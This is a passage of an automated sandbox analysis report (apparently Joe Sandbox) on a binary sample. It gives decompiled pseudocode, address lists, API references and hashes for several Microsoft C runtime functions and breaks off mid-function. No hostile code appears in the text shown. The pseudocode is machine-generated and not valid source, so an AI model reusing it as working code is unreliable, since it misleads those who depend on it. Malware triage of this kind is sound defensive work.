                                                                                              0x00403648
                                                                                              0x0040364b
                                                                                              0x00403659
                                                                                              0x0040365e
                                                                                              0x00403663
                                                                                              0x00403666
                                                                                              0x0040366b
                                                                                              0x0040366e
                                                                                              0x00403671
                                                                                              0x00403673
                                                                                              0x00403675
                                                                                              0x00403675
                                                                                              0x0040367a
                                                                                              0x00403686
                                                                                              0x0040368c
                                                                                              0x00403691
                                                                                              0x00403694
                                                                                              0x00403695
                                                                                              0x00000000
                                                                                              0x00403695
                                                                                              0x00403401
                                                                                              0x004033df
                                                                                              0x0040339f
                                                                                              0x00403380
                                                                                              0x00403372
                                                                                              0x0040333e

                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 0040341A
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00403528
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0040367A
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00403695
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 2751267872-393685449
                                                                                              • Opcode ID: eda5b51e541b8c75a46f8b7e37999aa0fe609277d036eee92786ab14f38096a5
                                                                                              • Instruction ID: 19b1cdf7328a50f0e26886633731e3eefc57d8e34b795240d2a1bb8afd65c404
                                                                                              • Opcode Fuzzy Hash: eda5b51e541b8c75a46f8b7e37999aa0fe609277d036eee92786ab14f38096a5
                                                                                              • Instruction Fuzzy Hash: C7B16A71800209EFCF25DFA5C8419AEBBB9BF04316B10456BE8017B392D779DA61CF99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E77E Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0040E77E(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x418014; // 0xcd317e6f
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = E0040E762(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = E0040E762(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E00409936(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E0040A663(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										E00410BE0(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E00409936(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													E0040A7B2();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E00409936(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E0040A663(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																E00410BE0(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E00409936(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = E0040AD83(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			E0040A7B2(_t101);
																			E0040A7B2(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			E0040A7B2();
																			E0040A7B2(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E00401BA5(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

































                                                                                              0x0040e786
                                                                                              0x0040e78d
                                                                                              0x0040e793
                                                                                              0x0040e797
                                                                                              0x0040e79e
                                                                                              0x0040e7a1
                                                                                              0x0040e7a4
                                                                                              0x0040e7a7
                                                                                              0x0040e7aa
                                                                                              0x0040e7b0
                                                                                              0x0040e7c5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e7b2
                                                                                              0x0040e7b4
                                                                                              0x0040e7bb
                                                                                              0x0040e7be
                                                                                              0x0040e7cb
                                                                                              0x0040e7cb
                                                                                              0x0040e7d0
                                                                                              0x0040e7e5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e7d2
                                                                                              0x0040e7da
                                                                                              0x0040e7dd
                                                                                              0x0040e7eb
                                                                                              0x0040e7eb
                                                                                              0x0040e7f0
                                                                                              0x0040e7f7
                                                                                              0x0040e7fa
                                                                                              0x0040e7fa
                                                                                              0x0040e7ff
                                                                                              0x0040e80b
                                                                                              0x0040ea16
                                                                                              0x0040ea16
                                                                                              0x00000000
                                                                                              0x0040e811
                                                                                              0x0040e814
                                                                                              0x0040e8a0
                                                                                              0x0040e8a2
                                                                                              0x0040e81a
                                                                                              0x0040e81d
                                                                                              0x0040e865
                                                                                              0x0040e865
                                                                                              0x00000000
                                                                                              0x0040e81f
                                                                                              0x0040e82c
                                                                                              0x00000000
                                                                                              0x0040e832
                                                                                              0x0040e834
                                                                                              0x0040e86f
                                                                                              0x00000000
                                                                                              0x0040e871
                                                                                              0x0040e875
                                                                                              0x0040e87b
                                                                                              0x0040e87e
                                                                                              0x0040e880
                                                                                              0x0040e883
                                                                                              0x0040e883
                                                                                              0x0040e888
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e88a
                                                                                              0x0040e88e
                                                                                              0x0040e898
                                                                                              0x0040e89e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e88e
                                                                                              0x0040e883
                                                                                              0x0040e87e
                                                                                              0x00000000
                                                                                              0x0040e875
                                                                                              0x0040e836
                                                                                              0x0040e83a
                                                                                              0x0040e840
                                                                                              0x0040e843
                                                                                              0x0040e845
                                                                                              0x0040e848
                                                                                              0x0040e848
                                                                                              0x0040e84d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e84f
                                                                                              0x0040e853
                                                                                              0x0040e85d
                                                                                              0x0040e863
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e853
                                                                                              0x0040e848
                                                                                              0x0040e843
                                                                                              0x00000000
                                                                                              0x0040e867
                                                                                              0x0040e867
                                                                                              0x0040e867
                                                                                              0x0040e834
                                                                                              0x0040e82c
                                                                                              0x0040e81d
                                                                                              0x0040e814
                                                                                              0x0040e8a8
                                                                                              0x0040e8a8
                                                                                              0x0040e8b3
                                                                                              0x0040e8b8
                                                                                              0x0040e8bb
                                                                                              0x0040e8c0
                                                                                              0x0040e9c6
                                                                                              0x0040e9c6
                                                                                              0x0040e8c6
                                                                                              0x0040e8c9
                                                                                              0x0040e8ce
                                                                                              0x0040e8d0
                                                                                              0x0040e8d2
                                                                                              0x0040ea12
                                                                                              0x0040ea12
                                                                                              0x00000000
                                                                                              0x0040e8d8
                                                                                              0x0040e8dd
                                                                                              0x0040e8fc
                                                                                              0x0040e901
                                                                                              0x00000000
                                                                                              0x0040e907
                                                                                              0x0040e907
                                                                                              0x00000000
                                                                                              0x0040e907
                                                                                              0x0040e8df
                                                                                              0x0040e8df
                                                                                              0x0040e8e4
                                                                                              0x0040e8e8
                                                                                              0x00000000
                                                                                              0x0040e8ee
                                                                                              0x0040e8ee
                                                                                              0x0040e90d
                                                                                              0x0040e90d
                                                                                              0x0040e912
                                                                                              0x00000000
                                                                                              0x0040e918
                                                                                              0x0040e920
                                                                                              0x0040e926
                                                                                              0x0040e92b
                                                                                              0x0040e930
                                                                                              0x0040ea0a
                                                                                              0x0040ea0a
                                                                                              0x0040ea0b
                                                                                              0x0040ea0b
                                                                                              0x00000000
                                                                                              0x0040e936
                                                                                              0x0040e93b
                                                                                              0x0040e942
                                                                                              0x0040e947
                                                                                              0x0040e94a
                                                                                              0x0040e94f
                                                                                              0x00000000
                                                                                              0x0040e955
                                                                                              0x0040e958
                                                                                              0x0040e95d
                                                                                              0x0040e95f
                                                                                              0x0040e961
                                                                                              0x0040ea06
                                                                                              0x0040ea06
                                                                                              0x00000000
                                                                                              0x0040e967
                                                                                              0x0040e96c
                                                                                              0x0040e98b
                                                                                              0x0040e990
                                                                                              0x00000000
                                                                                              0x0040e992
                                                                                              0x0040e992
                                                                                              0x00000000
                                                                                              0x0040e992
                                                                                              0x0040e96e
                                                                                              0x0040e96e
                                                                                              0x0040e973
                                                                                              0x0040e977
                                                                                              0x00000000
                                                                                              0x0040e97d
                                                                                              0x0040e97d
                                                                                              0x0040e998
                                                                                              0x0040e998
                                                                                              0x0040e99d
                                                                                              0x00000000
                                                                                              0x0040e99f
                                                                                              0x0040e9b6
                                                                                              0x0040e9ed
                                                                                              0x0040e9f3
                                                                                              0x0040e9f5
                                                                                              0x0040e9fb
                                                                                              0x0040ea02
                                                                                              0x0040e9b8
                                                                                              0x0040e9b8
                                                                                              0x0040e9b9
                                                                                              0x0040e9b9
                                                                                              0x0040e9bf
                                                                                              0x0040e9c5
                                                                                              0x00000000
                                                                                              0x0040e9c5
                                                                                              0x0040e9b6
                                                                                              0x0040e99d
                                                                                              0x0040e977
                                                                                              0x0040e96c
                                                                                              0x0040e961
                                                                                              0x0040e94f
                                                                                              0x0040e930
                                                                                              0x0040e912
                                                                                              0x0040e8e8
                                                                                              0x0040e8dd
                                                                                              0x0040e8d2
                                                                                              0x0040e8c0
                                                                                              0x0040e7ff
                                                                                              0x0040e7d0
                                                                                              0x0040e9c8
                                                                                              0x0040e9d9

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(005B31B0,005B31B0,?,7FFFFFFF,?,0040EA4E,005B31B0,005B31B0,?,005B31B0,?,?,?,?,005B31B0,?), ref: 0040E824
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040E8DF
                                                                                              • __alloca_probe_16.LIBCMT ref: 0040E96E
                                                                                              • __freea.LIBCMT ref: 0040E9B9
                                                                                              • __freea.LIBCMT ref: 0040E9BF
                                                                                              • __freea.LIBCMT ref: 0040E9F5
                                                                                              • __freea.LIBCMT ref: 0040E9FB
                                                                                              • __freea.LIBCMT ref: 0040EA0B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                              • String ID:
                                                                                              • API String ID: 127012223-0
                                                                                              • Opcode ID: 27c47a7dc26d0ffb21a77f731f5a69fc490dbf35d84bba0bcf47149d380b96ce
                                                                                              • Instruction ID: 338f6bc67a70bc89b58217c290c947b83195ac304040055ac93d5e37ccb5ace5
                                                                                              • Opcode Fuzzy Hash: 27c47a7dc26d0ffb21a77f731f5a69fc490dbf35d84bba0bcf47149d380b96ce
                                                                                              • Instruction Fuzzy Hash: D971D772A002059BDF30AA678C81BAF77B5AF49714F18487BE904B73D1D63DDC6087A9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 68%
                                                                                              			E00401D20(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E00410D50(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x418014;
				E00401CE0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x418014);
				E00402377(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00402360(_t77, 0xfffffffe, _t96, 0x418014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E00402300(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00401CE0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x411218;
											if(__eflags != 0) {
												_t72 = E00410950(__eflags, 0x411218);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x411218; // 0x401ef0
													 *0x4111c0(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00402340(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00402360(_t64, _t93, _t96, 0x418014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00401CE0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00402320();
										asm("int3");
										_t66 = E004024B1();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E00402463(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E004024ED();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}






























                                                                                              0x00401d20
                                                                                              0x00401d27
                                                                                              0x00401d2b
                                                                                              0x00401d2c
                                                                                              0x00401d32
                                                                                              0x00401d3e
                                                                                              0x00401d40
                                                                                              0x00401d46
                                                                                              0x00401d46
                                                                                              0x00401d4f
                                                                                              0x00401d51
                                                                                              0x00401d54
                                                                                              0x00401d57
                                                                                              0x00401d5f
                                                                                              0x00401d64
                                                                                              0x00401d67
                                                                                              0x00401d6a
                                                                                              0x00401d71
                                                                                              0x00401dcd
                                                                                              0x00401dd0
                                                                                              0x00401dd8
                                                                                              0x00401ddf
                                                                                              0x00000000
                                                                                              0x00401ddf
                                                                                              0x00000000
                                                                                              0x00401d73
                                                                                              0x00401d73
                                                                                              0x00401d79
                                                                                              0x00401d7f
                                                                                              0x00401d85
                                                                                              0x00401df0
                                                                                              0x00401df9
                                                                                              0x00401d87
                                                                                              0x00401d87
                                                                                              0x00401d87
                                                                                              0x00401d8d
                                                                                              0x00401d90
                                                                                              0x00401d93
                                                                                              0x00401d96
                                                                                              0x00401d99
                                                                                              0x00401d9e
                                                                                              0x00401db4
                                                                                              0x00000000
                                                                                              0x00401da0
                                                                                              0x00401da0
                                                                                              0x00401da2
                                                                                              0x00401da7
                                                                                              0x00401da9
                                                                                              0x00401dac
                                                                                              0x00401dae
                                                                                              0x00401dc4
                                                                                              0x00401de4
                                                                                              0x00401de4
                                                                                              0x00401de8
                                                                                              0x00000000
                                                                                              0x00401db0
                                                                                              0x00401db0
                                                                                              0x00401dfa
                                                                                              0x00401dfd
                                                                                              0x00401e03
                                                                                              0x00401e05
                                                                                              0x00401e0c
                                                                                              0x00401e13
                                                                                              0x00401e18
                                                                                              0x00401e1b
                                                                                              0x00401e1d
                                                                                              0x00401e1f
                                                                                              0x00401e2c
                                                                                              0x00401e32
                                                                                              0x00401e34
                                                                                              0x00401e37
                                                                                              0x00401e37
                                                                                              0x00401e3a
                                                                                              0x00401e3a
                                                                                              0x00401e0c
                                                                                              0x00401e40
                                                                                              0x00401e42
                                                                                              0x00401e47
                                                                                              0x00401e4a
                                                                                              0x00401e4d
                                                                                              0x00401e55
                                                                                              0x00401e59
                                                                                              0x00401e5e
                                                                                              0x00401e5e
                                                                                              0x00401e61
                                                                                              0x00401e65
                                                                                              0x00401e68
                                                                                              0x00401e75
                                                                                              0x00401e78
                                                                                              0x00401e7d
                                                                                              0x00401e7e
                                                                                              0x00401e83
                                                                                              0x00401e85
                                                                                              0x00401e8a
                                                                                              0x00401e8f
                                                                                              0x00401e91
                                                                                              0x00401e9c
                                                                                              0x00401e93
                                                                                              0x00401e93
                                                                                              0x00000000
                                                                                              0x00401e93
                                                                                              0x00401e87
                                                                                              0x00401e87
                                                                                              0x00401e87
                                                                                              0x00401e89
                                                                                              0x00401e89
                                                                                              0x00401db2
                                                                                              0x00000000
                                                                                              0x00401db2
                                                                                              0x00401db0
                                                                                              0x00401dae
                                                                                              0x00000000
                                                                                              0x00401db7
                                                                                              0x00401db7
                                                                                              0x00401db9
                                                                                              0x00401dc0
                                                                                              0x00000000
                                                                                              0x00401dc2
                                                                                              0x00000000
                                                                                              0x00401dc0
                                                                                              0x00401d85
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00401D57
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00401D5F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00401DE8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00401E13
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00401E68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: db0b67800021d586d97c5f30007a81e7b1ebe17f1bc305aed81161ec5f427420
                                                                                              • Instruction ID: a895de2db4384249efec75979a2744926e6d9999ae7923b975825012261e0031
                                                                                              • Opcode Fuzzy Hash: db0b67800021d586d97c5f30007a81e7b1ebe17f1bc305aed81161ec5f427420
                                                                                              • Instruction Fuzzy Hash: DA41B430A002089BCF10DF69C884ADE7BB5BF45318F14816AE915AB3E2C779EA45CB94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040ABD4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040ABD4(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x419230 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x412b00 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x419230 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x419230 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E004062C8(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E004062C8(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                                                              0x0040abdd
                                                                                              0x0040ac72
                                                                                              0x0040abe5
                                                                                              0x0040abe7
                                                                                              0x0040abf1
                                                                                              0x0040abf6
                                                                                              0x0040ac03
                                                                                              0x0040ac18
                                                                                              0x0040ac1c
                                                                                              0x0040ac82
                                                                                              0x0040ac87
                                                                                              0x0040ac8e
                                                                                              0x0040ac92
                                                                                              0x0040ac95
                                                                                              0x0040ac95
                                                                                              0x0040ac9b
                                                                                              0x0040ac9b
                                                                                              0x0040ac7d
                                                                                              0x0040ac81
                                                                                              0x0040ac81
                                                                                              0x0040ac1e
                                                                                              0x0040ac27
                                                                                              0x0040ac60
                                                                                              0x0040ac6d
                                                                                              0x0040ac6f
                                                                                              0x0040ac6f
                                                                                              0x00000000
                                                                                              0x0040ac6f
                                                                                              0x0040ac31
                                                                                              0x0040ac36
                                                                                              0x0040ac3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ac45
                                                                                              0x0040ac4a
                                                                                              0x0040ac4f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ac54
                                                                                              0x0040ac5a
                                                                                              0x0040ac5e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ac5e
                                                                                              0x0040abfb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040ac01
                                                                                              0x0040ac7b
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,CD317E6F,?,0040ACE3,?,00000040,00000000,?), ref: 0040AC95
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: 72102d71db0d740a636a136709c49b0cbbc7d86d1844d356bd255f86707a879b
                                                                                              • Instruction ID: 2b3ad517c27c90a8f3debe6dcae3ebb6b1176818c0ed6ddda35c9a4bc4d21c22
                                                                                              • Opcode Fuzzy Hash: 72102d71db0d740a636a136709c49b0cbbc7d86d1844d356bd255f86707a879b
                                                                                              • Instruction Fuzzy Hash: CC210835A04311A7E722DB209D45ADB3768AB45760F268136ED02B73D0D738EE11C6EE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004023D1 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E004023D1(void* __ecx) {
